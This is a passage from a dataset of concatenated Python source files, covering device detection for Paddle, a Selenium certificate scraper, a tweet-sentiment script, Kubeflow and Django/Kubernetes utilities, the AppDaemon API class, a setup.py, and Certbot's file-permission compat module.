return the device label/id relative to the visible devices
'''
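        # e.g. with visible labels ['3', '5'], devices='5' maps to ['1'];
        # with devices='' every visible label is returned by position: ['0', '1']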
if not devices:
return [str(x) for x in range(0, len(self._labels))]
else:
devs = [x.strip() for x in devices.split(',')]
return [str(self._labels.index(d)) for d in devs]
@classmethod
    def parse_device(cls):
dev = Device()
visible_devices = None
if 'CUDA_VISIBLE_DEVICES' in os.environ or 'NVIDIA_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.GPU
visible_devices = os.getenv("CUDA_VISIBLE_DEVICES") or os.getenv(
"NVIDIA_VISIBLE_DEVICES")
elif 'XPU_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.XPU
visible_devices = os.getenv("XPU_VISIBLE_DEVICES")
elif 'ASCEND_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.NPU
visible_devices = os.getenv("ASCEND_VISIBLE_DEVICES")
elif 'MLU_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.MLU
visible_devices = os.getenv("MLU_VISIBLE_DEVICES")
if visible_devices is not None and visible_devices != 'all':
dev._labels = visible_devices.split(',')
else:
            return cls.detect_device()
return dev
@classmethod
    def detect_device(cls):
import paddle.fluid as fluid
dev = Device()
num = 0
visible_devices = None
if fluid.core.is_compiled_with_cuda():
dev._dtype = DeviceType.GPU
num = fluid.core.get_cuda_device_count()
visible_devices = os.getenv("CUDA_VISIBLE_DEVICES") or os.getenv(
"NVIDIA_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_xpu():
dev._dtype = DeviceType.XPU
num = fluid.core.get_xpu_device_count()
visible_devices = os.getenv("XPU_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_npu():
dev._dtype = DeviceType.NPU
num = fluid.core.get_npu_device_count()
visible_devices = os.getenv("ASCEND_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_mlu():
dev._dtype = DeviceType.MLU
num = fluid.core.get_mlu_device_count()
visible_devices = os.getenv("MLU_VISIBLE_DEVICES")
if num == 0:
dev._dtype = DeviceType.CPU
elif visible_devices is None or visible_devices == "all":
dev._labels = [str(x) for x in range(0, num)]
else:
dev._labels = visible_devices.split(',')
return dev
if __name__ == '__main__':
d = Device.parse_device()
print(d.get_selected_devices())
|
py | 7df7dc766375d117f390c6683149da074a65c33f | # Minimal HX711 driver demo
import board
from hx711_pio import HX711_PIO
pin_data = board.D5
pin_clk = board.D6
hx711 = HX711_PIO(pin_data, pin_clk)
while True:
print(hx711.read_raw()) |
py | 7df7dcd26f6ce25787e34598adc8552f42b9fb03 | import csv
from datetime import date
import dataclasses
import time
from typing import List
import geojson
from lxml import html
from selenium.webdriver import Firefox
from helpers import extract_latitude, extract_longitude
@dataclasses.dataclass
class Certificate:
id: str
status: str
holder: str
scope: str
materials: str
valid_from: str
valid_to: str
body_short: str
latitude: float
longitude: float
certificate_url: str
audit_url: str
downloaded: str
@classmethod
def prepare_fieldnames(cls):
return list(cls.__dataclass_fields__.keys())
@property
def __geo_interface__(self):
return {
'type': 'Feature',
'geometry': {
'type': 'Point',
'coordinates': (self.longitude, self.latitude),
},
'id': self.id,
'properties': {
'holder': self.holder,
'body': self.body_short,
'valid_from': self.valid_from,
'valid_to': self.valid_to,
},
}
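# Certificate implements the __geo_interface__ protocol, so every instance exposes a
# GeoJSON-style Feature mapping. A rough export sketch using the imported geojson package:
# geojson.dumps({'type': 'FeatureCollection',
#                'features': [cert.__geo_interface__ for cert in data]})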
URL = "https://www.iscc-system.org/certificates/valid-certificates/"
def data_to_csv(data: List[Certificate], filename: str = 'valid-certificates.csv'):
"""Save list with certificates to csv file."""
with open(filename, 'w') as csvf:
writer = csv.DictWriter(csvf, fieldnames=Certificate.prepare_fieldnames())
writer.writeheader()
for cert in data:
writer.writerow(dataclasses.asdict(cert))
def cert_dict_from_tablerow(tr: html.HtmlElement) -> dict:
"""Take tablerow and prepare a dictionary representing one certificate.
Find data with xpath and clean them if necessary.
"""
cert = {}
xpath_map = {
'id': 'td[@class=" column-cert_number"]/text()',
'holder': 'td[contains(@class, "column-cert_owner")]/span/text()',
'scope': 'td[contains(@class, "column-cert_certified_as")]/span/text()',
'materials': 'td[contains(@class, "column-cert_in_put")]/text()',
'valid_from': 'td[contains(@class, "column-cert_valid_from")]/text()',
'valid_to': 'td[contains(@class, "column-cert_valid_until")]/text()',
'body_short': 'td[contains(@class, "column-cert_issuer")]/span/text()',
'latitude': 'td[contains(@class, "column-cert_map")]/a/@href',
'longitude': 'td[contains(@class, "column-cert_map")]/a/@href',
'certificate_url': 'td[contains(@class, "column-cert_file")]/a/@href',
'audit_url': 'td[contains(@class, "column-cert_audit")]/a/@href',
}
clean_map = {
'latitude': extract_latitude,
'longitude': extract_longitude,
'certificate_url': str.strip,
'audit_url': str.strip,
}
cert['status'] = 'valid'
for k, v in xpath_map.items():
try:
if k in clean_map:
clean_func = clean_map[k]
cert[k] = clean_func(tr.xpath(v)[0])
else:
cert[k] = tr.xpath(v)[0]
except IndexError:
cert[k] = None #type: ignore
cert['downloaded'] = date.today().isoformat()
return cert
def parse_tree(tree: html.HtmlElement) -> List[Certificate]:
"""Parse the web page and return list with certificates."""
trs = tree.xpath('//table[@id="table_1"]/tbody/tr')
# Parse data from table rows
data = []
for tr in trs:
cert_dict = cert_dict_from_tablerow(tr)
cert = Certificate(**cert_dict)
data.append(cert)
return data
def main():
driver = Firefox()
driver.get(URL)
try:
driver.implicitly_wait(10)
# First click on the default table length button
driver.find_element_by_id('table_1_length').click()
# Select All from the dropdown menu
driver.find_element_by_xpath('//li[@data-original-index="6"]').click()
time.sleep(15)
# Parse html string to lxml tree
tree = html.document_fromstring(driver.page_source)
# Get all table rows
data = parse_tree(tree)
finally:
driver.close()
data_to_csv(data)
if __name__ == '__main__':
main()
|
py | 7df7dd673f4884f05b9688548652da4a4d4765e5 | # A script written for a friend
# who needed a way to get tweets
# with sentiment data, to use
# for a time series analysis
# to predict stock price changes.
import tweepy
import numpy as np
from nltk.sentiment.vader import SentimentIntensityAnalyzer
import pandas as pd
import pynance
import os
cwd = os.getcwd()
search_term = input("Enter search term: ")
# Consumer keys and access tokens, used for OAuth
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
# OAuth process, using the keys and tokens
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# Creation of the actual interface, using authentication
api = tweepy.API(auth)
# Create the VADER sentiment analyzer
sid = SentimentIntensityAnalyzer()
tweets = api.search(search_term, count=100)
df = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweets'])
df['Sentiment'] = df['Tweets'].apply(lambda x: sid.polarity_scores(x))
df['Good_Bad'] = df['Sentiment'].apply(lambda x: x['compound'])
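# VADER's 'compound' score is a normalized value in [-1, 1]; a common convention treats
# scores above roughly +0.05 as positive and below -0.05 as negative.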
df.to_csv(cwd + f"/{search_term}")
print(df)
|
py | 7df7de47698cd49b9f810e5d512010eef1046b30 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import kfp.dsl as dsl
import kfp.compiler
import os
import shutil
import subprocess
import sys
import tempfile
from deprecated.sphinx import deprecated
def parse_arguments():
"""Parse command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('--py',
type=str,
help='local absolute path to a py file.')
parser.add_argument('--function',
type=str,
help='The name of the function to compile if there are multiple.')
parser.add_argument('--namespace',
type=str,
help='The namespace for the pipeline function')
parser.add_argument('--output',
type=str,
required=True,
help='local path to the output workflow yaml file.')
parser.add_argument('--disable-type-check',
action='store_true',
help='disable the type check, default is enabled.')
args = parser.parse_args()
return args
def _compile_pipeline_function(pipeline_funcs, function_name, output_path, type_check):
if len(pipeline_funcs) == 0:
raise ValueError('A function with @dsl.pipeline decorator is required in the py file.')
if len(pipeline_funcs) > 1 and not function_name:
func_names = [x.__name__ for x in pipeline_funcs]
raise ValueError('There are multiple pipelines: %s. Please specify --function.' % func_names)
if function_name:
pipeline_func = next((x for x in pipeline_funcs if x.__name__ == function_name), None)
if not pipeline_func:
raise ValueError('The function "%s" does not exist. '
'Did you forget @dsl.pipeline decoration?' % function_name)
else:
pipeline_func = pipeline_funcs[0]
kfp.compiler.Compiler().compile(pipeline_func, output_path, type_check)
class PipelineCollectorContext():
def __enter__(self):
pipeline_funcs = []
def add_pipeline(func):
pipeline_funcs.append(func)
return func
self.old_handler = dsl._pipeline._pipeline_decorator_handler
dsl._pipeline._pipeline_decorator_handler = add_pipeline
return pipeline_funcs
def __exit__(self, *args):
dsl._pipeline._pipeline_decorator_handler = self.old_handler
def compile_pyfile(pyfile, function_name, output_path, type_check):
sys.path.insert(0, os.path.dirname(pyfile))
try:
filename = os.path.basename(pyfile)
with PipelineCollectorContext() as pipeline_funcs:
__import__(os.path.splitext(filename)[0])
_compile_pipeline_function(pipeline_funcs, function_name, output_path, type_check)
finally:
del sys.path[0]
def main():
args = parse_arguments()
if args.py is None:
raise ValueError('The --py option must be specified.')
compile_pyfile(
args.py,
args.function,
args.output,
not args.disable_type_check,
)
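# Rough usage sketch, assuming main() is wired up as a console entry point:
#   <entry-point> --py my_pipeline.py --function my_pipeline --output pipeline.yaml
# my_pipeline.py and my_pipeline are placeholders for a file containing one or more
# functions decorated with @dsl.pipeline.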
|
py | 7df7df3463cc73a341b23a79277868f73966135f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.views.generic import View
from django.shortcuts import render
from django.http import HttpResponse
import logging
import datetime
from kubernetes.client.rest import ApiException
from kubernetes import client, config
from pprint import pprint
import json
logger = logging.getLogger('django')
# Create your views here.
class QueryPv(View):
def __init__(self):
super(QueryPv, self).__init__()
self.return_data = []
self.v1 = client.CoreV1Api()
def get(self, request):
return render(request, 'querypv.html')
def post(self, request):
req_dict = {}
ret_list = []
ns_list = []
method = None
name = None
pvs = self.v1.list_persistent_volume(watch=False)
        print(type(pvs))
if request.body and request.body.strip() != '{}':
req_dict = json.loads(request.body)
method = req_dict['method'] if 'method' in req_dict and req_dict['method'].strip() != '' else 'query'
name = req_dict['name'] if 'name' in req_dict and req_dict['name'].strip() != '' else None
#label = req_dict['label'] if 'label' in req_dict and req_dict['label'].strip() != '' else None
#status = req_dict['status'].lower() if 'status' in req_dict and req_dict['status'].strip() != '' else None
#logger.debug('3 var is: %(pod_name)s %(host_ip)s %(namespace)s', req_dict)
for i in pvs.items:
if name and name not in i.metadata.name:
continue
ret_name = i.metadata.name
ret_status = i.status.phase
ret_capacity = i.spec.capacity['storage']
ret_mode = i.spec.access_modes
ret_claimref = i.spec.claim_ref.name
ret_list.append({'field1': ret_name, 'field2': ret_capacity, 'field3': ret_mode, 'field4': ret_claimref, 'field5': ret_status})
if method and method == 'query':
pass
ret_title = ('name', 'capacity', 'access_mode', 'claimref', 'status')
        # pvs is a kubernetes client model and is not directly JSON serializable, so convert
        # it to a plain dict and let json fall back on str() for values such as datetimes.
        ret_dict = {'items': ret_list, 'title': ret_title, 'detail_data': pvs.to_dict()}
        ret_data = json.dumps(ret_dict, default=str)
return HttpResponse(ret_data)
|
py | 7df7dfaa62adc009239af41a874b6cca72a9ccd9 | import datetime
import inspect
import iso8601
import re
from datetime import timedelta
import appdaemon.utils as utils
from appdaemon.appdaemon import AppDaemon
class ADAPI:
#
# Internal
#
def __init__(self, ad: AppDaemon, name, logging_obj, args, config, app_config, global_vars):
# Store args
self.AD = ad
self.name = name
self._logging = logging_obj
self.config = config
self.app_config = app_config
self.args = args
self.global_vars = global_vars
self._namespace = "default"
self.logger = self._logging.get_child(name)
self.err = self._logging.get_error().getChild(name)
self.user_logs = {}
if "log_level" in args:
self.logger.setLevel(args["log_level"])
self.err.setLevel(args["log_level"])
if "log" in args:
userlog = self.get_user_log(args["log"])
if userlog is not None:
self.logger = userlog
@staticmethod
def _sub_stack(msg):
# If msg is a data structure of some type, don't sub
if type(msg) is str:
stack = inspect.stack()
if msg.find("__module__") != -1:
msg = msg.replace("__module__", stack[2][1])
if msg.find("__line__") != -1:
msg = msg.replace("__line__", str(stack[2][2]))
if msg.find("__function__") != -1:
msg = msg.replace("__function__", stack[2][3])
return msg
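    # Illustrative: self.log("entered __function__ at line __line__") has the placeholders
    # replaced with the calling app's function name and line number before logging.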
def _get_namespace(self, **kwargs):
if "namespace" in kwargs:
namespace = kwargs["namespace"]
del kwargs["namespace"]
else:
namespace = self._namespace
return namespace
#
# Logging
#
def _log(self, logger, msg, *args, **kwargs):
msg = self._sub_stack(msg)
if "level" in kwargs:
level = kwargs.get("level", "INFO")
kwargs.pop("level")
else:
level = "INFO"
ascii_encode = kwargs.get("ascii_encode", True)
if ascii_encode is True:
safe_enc = lambda s: str(s).encode("utf-8", "replace").decode("ascii", "replace")
msg = safe_enc(msg)
logger.log(self._logging.log_levels[level], msg, *args, **kwargs)
def log(self, msg, *args, **kwargs):
if "log" in kwargs:
# Its a user defined log
logger = self.get_user_log(kwargs["log"])
kwargs.pop("log")
else:
logger = self.logger
self._log(logger, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self._log(self.err, msg, *args, **kwargs)
def listen_log(self, cb, level="INFO", **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self, self.AD.logging.add_log_callback(namespace, self.name, cb, level, **kwargs))
def cancel_listen_log(self, handle):
self.logger.debug("Canceling listen_log for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.logging.cancel_log_callback(self.name, handle))
def get_main_log(self):
return self.logger
def get_error_log(self):
return self.err
def get_user_log(self, log):
logger = None
if log in self.user_logs:
# Did we use it already?
logger = self.user_logs[log]
else:
# Build it on the fly
parent = self.AD.logging.get_user_log(self, log)
if parent is not None:
logger = parent.getChild(self.name)
self.user_logs[log] = logger
if "log_level" in self.args:
logger.setLevel(self.args["log_level"])
return logger
def set_log_level(self, level):
self.logger.setLevel(self._logging.log_levels[level])
self.err.setLevel(self._logging.log_levels[level])
for log in self.user_logs:
self.user_logs[log].setLevel(self._logging.log_levels[level])
def set_error_level(self, level):
self.err.setLevel(self._logging.log_levels[level])
#
# Threading
#
def set_app_pin(self, pin):
utils.run_coroutine_threadsafe(self, self.AD.threading.set_app_pin(self.name, pin))
def get_app_pin(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_app_pin(self.name))
def set_pin_thread(self, thread):
utils.run_coroutine_threadsafe(self, self.AD.threading.set_pin_thread(self.name, thread))
def get_pin_thread(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_pin_thread(self.name))
#
# Namespace
#
def set_namespace(self, namespace):
self._namespace = namespace
def get_namespace(self):
return self._namespace
def list_namespaces(self):
return utils.run_coroutine_threadsafe(self, self.AD.state.list_namespaces())
def save_namespace(self, namespace):
utils.run_coroutine_threadsafe(self, self.AD.state.save_namespace(namespace))
#
# Utility
#
def get_app(self, name):
return utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app(name))
def _check_entity(self, namespace, entity):
if "." not in entity:
raise ValueError(
"{}: Invalid entity ID: {}".format(self.name, entity))
if not utils.run_coroutine_threadsafe(self, self.AD.state.entity_exists(namespace, entity)):
self.logger.warning("%s: Entity %s not found in namespace %s", self.name, entity, namespace)
def get_ad_version(self):
return utils.__version__
def entity_exists(self, entity_id, **kwargs):
namespace = self._get_namespace(**kwargs)
return utils.run_coroutine_threadsafe(self, self.AD.state.entity_exists(namespace, entity_id))
def split_entity(self, entity_id, **kwargs):
self._check_entity(self._get_namespace(**kwargs), entity_id)
return entity_id.split(".")
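    # Illustrative: split_entity("light.kitchen") returns ["light", "kitchen"].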
def split_device_list(self, list_):
return list_.split(",")
def get_plugin_config(self, **kwargs):
namespace = self._get_namespace(**kwargs)
return utils.run_coroutine_threadsafe(self, self.AD.plugins.get_plugin_meta(namespace))
def friendly_name(self, entity_id, **kwargs):
self._check_entity(self._get_namespace(**kwargs), entity_id)
state = self.get_state(**kwargs)
if entity_id in state:
if "friendly_name" in state[entity_id]["attributes"]:
return state[entity_id]["attributes"]["friendly_name"]
else:
return entity_id
return None
#
# Apiai
#
@staticmethod
def get_apiai_intent(data):
if "result" in data and "action" in data["result"]:
return data["result"]["action"]
else:
return None
@staticmethod
def get_apiai_slot_value(data, slot=None):
if "result" in data and \
"contexts" in data["result"]:
req = data.get('result')
contexts = req.get('contexts', [{}])
if contexts:
parameters = contexts[0].get('parameters')
else:
parameters = req.get('parameters')
if slot is None:
return parameters
else:
if slot in parameters:
return parameters[slot]
else:
return None
else:
return None
@staticmethod
def format_apiai_response(speech=None):
speech = \
{
"speech": speech,
"source": "Appdaemon",
"displayText": speech
}
return speech
#
# Alexa
#
@staticmethod
def format_alexa_response(speech=None, card=None, title=None):
response = \
{
"shouldEndSession": True
}
if speech is not None:
response["outputSpeech"] = \
{
"type": "PlainText",
"text": speech
}
if card is not None:
response["card"] = \
{
"type": "Simple",
"title": title,
"content": card
}
speech = \
{
"version": "1.0",
"response": response,
"sessionAttributes": {}
}
return speech
#
# API
#
def register_endpoint(self, cb, name=None):
if name is None:
ep = self.name
else:
ep = name
if self.AD.http is not None:
return utils.run_coroutine_threadsafe(self, self.AD.http.register_endpoint(cb, ep))
else:
self.logger.warning("register_endpoint for %s filed - HTTP component is not configured", name)
def unregister_endpoint(self, handle):
utils.run_coroutine_threadsafe(self, self.AD.http.unregister_endpoint(handle, self.name))
#
# State
#
def listen_state(self, cb, entity=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
name = self.name
if entity is not None and "." in entity:
self._check_entity(namespace, entity)
return utils.run_coroutine_threadsafe(self, self.AD.state.add_state_callback(name, namespace, entity, cb, kwargs))
def cancel_listen_state(self, handle):
self.logger.debug("Canceling listen_state for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.state.cancel_state_callback(handle, self.name))
def info_listen_state(self, handle):
self.logger.debug("Calling info_listen_state for %s",self.name)
return utils.run_coroutine_threadsafe(self, self.AD.state.info_state_callback(handle, self.name))
def get_state(self, entity_id=None, attribute=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self, self.AD.state.get_state(self.name, namespace, entity_id, attribute, **kwargs))
def set_state(self, entity_id, **kwargs):
self.logger.debug("set state: %s, %s", entity_id, kwargs)
namespace = self._get_namespace(**kwargs)
self._check_entity(namespace, entity_id)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self,
self.AD.state.set_state(self.name, namespace, entity_id, **kwargs))
#
# Service
#
@staticmethod
def _check_service(service):
if service.find("/") == -1:
raise ValueError("Invalid Service Name: {}".format(service))
def call_service(self, service, **kwargs):
self._check_service(service)
d, s = service.split("/")
self.logger.debug("call_service: %s/%s, %s", d, s, kwargs)
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self, self.AD.services.call_service(namespace, d, s, kwargs))
#
# Events
#
def listen_event(self, cb, event=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
_name = self.name
self.logger.debug("Calling listen_event for %s", self.name)
return utils.run_coroutine_threadsafe(self, self.AD.events.add_event_callback(_name, namespace, cb, event, **kwargs))
def cancel_listen_event(self, handle):
self.logger.debug("Canceling listen_event for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.events.cancel_event_callback(self.name, handle))
def info_listen_event(self, handle):
self.logger.debug("Calling info_listen_event for %s", self.name)
return utils.run_coroutine_threadsafe(self, self.AD.events.info_event_callback(self.name, handle))
def fire_event(self, event, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
utils.run_coroutine_threadsafe(self, self.AD.events.fire_event(namespace, event, **kwargs))
#
# Time
#
def parse_utc_string(self, s):
return datetime.datetime(*map(
            int, re.split(r'[^\d]', s)[:-1]
)).timestamp() + self.get_tz_offset() * 60
@staticmethod
def get_tz_offset():
utc_offset_min = int(round(
(datetime.datetime.now()
- datetime.datetime.utcnow()).total_seconds())
        ) / 60  # round because now() and utcnow() are sampled a moment apart
utc_offset_h = utc_offset_min / 60
# we do not handle 1/2 h timezone offsets
assert utc_offset_min == utc_offset_h * 60
return utc_offset_min
@staticmethod
def convert_utc(utc):
return iso8601.parse_date(utc)
def sun_up(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sun_up())
def sun_down(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sun_down())
def parse_time(self, time_str, name=None, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.parse_time(time_str, name, aware))
def parse_datetime(self, time_str, name=None, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.parse_datetime(time_str, name, aware))
def get_now(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now())
def get_now_ts(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now_ts())
def now_is_between(self, start_time_str, end_time_str, name=None):
return utils.run_coroutine_threadsafe(self, self.AD.sched.now_is_between(start_time_str, end_time_str, name))
def sunrise(self, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sunrise(aware))
def sunset(self, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sunset(aware))
def time(self):
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz).time())
def datetime(self, aware=False):
if aware is True:
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz))
else:
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now_naive())
def date(self):
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz).date())
def get_timezone(self):
return self.AD.time_zone
#
# Scheduler
#
def cancel_timer(self, handle):
name = self.name
utils.run_coroutine_threadsafe(self, self.AD.sched.cancel_timer(name, handle))
def info_timer(self, handle):
return utils.run_coroutine_threadsafe(self, self.AD.sched.info_timer(handle, self.name))
def run_in(self, callback, seconds, **kwargs):
name = self.name
self.logger.debug("Registering run_in in %s seconds for %s", seconds, name)
# convert seconds to an int if possible since a common pattern is to
# pass this through from the config file which is a string
exec_time = self.get_now() + timedelta(seconds=int(seconds))
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, exec_time, callback, False, None, **kwargs
))
return handle
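    # Illustrative: self.run_in(callback, "30") fires the callback in 30 seconds;
    # string values are accepted because seconds is cast to int above.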
def run_once(self, callback, start, **kwargs):
if type(start) == datetime.time:
when = start
elif type(start) == str:
when = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name, True))["datetime"].time()
else:
raise ValueError("Invalid type for start")
name = self.name
now = self.get_now()
today = now.date()
event = datetime.datetime.combine(today, when)
if event < now:
one_day = datetime.timedelta(days=1)
event = event + one_day
exec_time = event.timestamp()
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, exec_time, callback, False, None, **kwargs
))
return handle
def run_at(self, callback, start, **kwargs):
if type(start) == datetime.datetime:
when = start
elif type(start) == str:
when = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name))["datetime"]
else:
raise ValueError("Invalid type for start")
aware_when = self.AD.sched.convert_naive(when)
name = self.name
now = self.get_now()
if aware_when < now:
raise ValueError(
"{}: run_at() Start time must be "
"in the future".format(self.name)
)
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, aware_when, callback, False, None, **kwargs
))
return handle
def run_daily(self, callback, start, **kwargs):
info = None
when = None
if type(start) == datetime.time:
when = start
elif type(start) == str:
info = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name))
else:
raise ValueError("Invalid type for start")
if info is None or info["sun"] is None:
if when is None:
when = info["datetime"].time()
aware_now = self.get_now()
now = self.AD.sched.make_naive(aware_now)
today = now.date()
event = datetime.datetime.combine(today, when)
if event < now:
event = event + datetime.timedelta(days=1)
handle = self.run_every(callback, event, 24 * 60 * 60, **kwargs)
elif info["sun"] == "sunrise":
kwargs["offset"] = info["offset"]
handle = self.run_at_sunrise(callback, **kwargs)
else:
kwargs["offset"] = info["offset"]
handle = self.run_at_sunset(callback, **kwargs)
return handle
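    # Illustrative: run_daily(cb, datetime.time(7, 0)) schedules a fixed 07:00 run each day,
    # while a string such as "sunrise + 00:30:00" takes the sunrise branch above with a
    # 30 minute offset applied.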
def run_hourly(self, callback, start, **kwargs):
now = self.get_now()
if start is None:
event = now + datetime.timedelta(hours=1)
else:
event = now
            event = event.replace(minute=start.minute, second=start.second)
if event < now:
event = event + datetime.timedelta(hours=1)
handle = self.run_every(callback, event, 60 * 60, **kwargs)
return handle
def run_minutely(self, callback, start, **kwargs):
now = self.get_now()
if start is None:
event = now + datetime.timedelta(minutes=1)
else:
event = now
event = event.replace(second=start.second)
if event < now:
event = event + datetime.timedelta(minutes=1)
handle = self.run_every(callback, event, 60, **kwargs)
return handle
def run_every(self, callback, start, interval, **kwargs):
name = self.name
now = self.get_now()
aware_start = self.AD.sched.convert_naive(start)
if aware_start < now:
raise ValueError("start cannot be in the past")
self.logger.debug("Registering run_every starting %s in %ss intervals for %s", aware_start, interval, name)
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(name, aware_start, callback, True, None,
interval=interval, **kwargs))
return handle
def _schedule_sun(self, name, type_, callback, **kwargs):
if type_ == "next_rising":
event = self.AD.sched.next_sunrise()
else:
event = self.AD.sched.next_sunset()
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, event, callback, True, type_, **kwargs
))
return handle
def run_at_sunset(self, callback, **kwargs):
name = self.name
self.logger.debug("Registering run_at_sunset with kwargs = %s for %s", kwargs, name)
handle = self._schedule_sun(name, "next_setting", callback, **kwargs)
return handle
def run_at_sunrise(self, callback, **kwargs):
name = self.name
self.logger.debug("Registering run_at_sunrise with kwargs = %s for %s", kwargs, name)
handle = self._schedule_sun(name, "next_rising", callback, **kwargs)
return handle
#
# Dashboard
#
def dash_navigate(self, target, timeout=-1, ret=None, sticky=0):
kwargs = {"command": "navigate", "target": target, "sticky": sticky}
if timeout != -1:
kwargs["timeout"] = timeout
if ret is not None:
kwargs["return"] = ret
self.fire_event("__HADASHBOARD_EVENT", **kwargs)
#
# Other
#
def run_in_thread(self, callback, thread):
self.run_in(callback, 0, pin=False, pin_thread=thread)
def get_thread_info(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_thread_info())
def get_scheduler_entries(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_scheduler_entries())
def get_callback_entries(self):
return utils.run_coroutine_threadsafe(self, self.AD.callbacks.get_callback_entries())
@staticmethod
def get_alexa_slot_value(data, slot=None):
if "request" in data and \
"intent" in data["request"] and \
"slots" in data["request"]["intent"]:
if slot is None:
return data["request"]["intent"]["slots"]
else:
if slot in data["request"]["intent"]["slots"] and \
"value" in data["request"]["intent"]["slots"][slot]:
return data["request"]["intent"]["slots"][slot]["value"]
else:
return None
else:
return None
@staticmethod
def get_alexa_error(data):
if "request" in data and "err" in data["request"] and "message" in data["request"]["err"]:
return data["request"]["err"]["message"]
else:
return None
@staticmethod
def get_alexa_intent(data):
if "request" in data and "intent" in data["request"] and "name" in data["request"]["intent"]:
return data["request"]["intent"]["name"]
else:
return None
|
py | 7df7dfe14ba4c81038e3d28e6750bd8c99a54f43 | import setuptools
#with open("README.md", "r") as fh:
# long_description = fh.read()
long_description="""
Project information here https://github.com/ParisNeo/QGraphViz
"""
setuptools.setup(
name='QGraphViz',
version='0.0.55',
author="Saifeddine ALOUI",
author_email="[email protected]",
description="A PyQt5 widget to manipulate (build, render, interact, load and save) Graphviz graphs",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ParisNeo/QGraphViz",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) |
py | 7df7dff11d5764356f2efad4ea1546fd5713b14c | """Compat module to handle files security on Windows and Linux"""
from __future__ import absolute_import
import errno
import os # pylint: disable=os-module-forbidden
import stat
import sys
from acme.magic_typing import List
try:
import ntsecuritycon
import win32security
import win32con
import win32api
import win32file
import pywintypes
import winerror
except ImportError:
POSIX_MODE = True
else:
POSIX_MODE = False
# Windows umask implementation, since Windows does not have a concept of umask by default.
# We choose 022 as initial value since it is the default one on most Linux distributions, and
# it is a decent choice to not have write permissions for group owner and everybody by default.
# We use a class here to avoid needing to define a global variable, and the potential mistakes
# that could happen with this kind of pattern.
class _WindowsUmask:
"""Store the current umask to apply on Windows"""
def __init__(self):
self.mask = 0o022
_WINDOWS_UMASK = _WindowsUmask()
def chmod(file_path, mode):
# type: (str, int) -> None
"""
Apply a POSIX mode on given file_path:
- for Linux, the POSIX mode will be directly applied using chmod,
- for Windows, the POSIX mode will be translated into a Windows DACL that make sense for
Certbot context, and applied to the file using kernel calls.
The definition of the Windows DACL that correspond to a POSIX mode, in the context of Certbot,
is explained at https://github.com/certbot/certbot/issues/6356 and is implemented by the
method `_generate_windows_flags()`.
:param str file_path: Path of the file
:param int mode: POSIX mode to apply
"""
if POSIX_MODE:
os.chmod(file_path, mode)
else:
_apply_win_mode(file_path, mode)
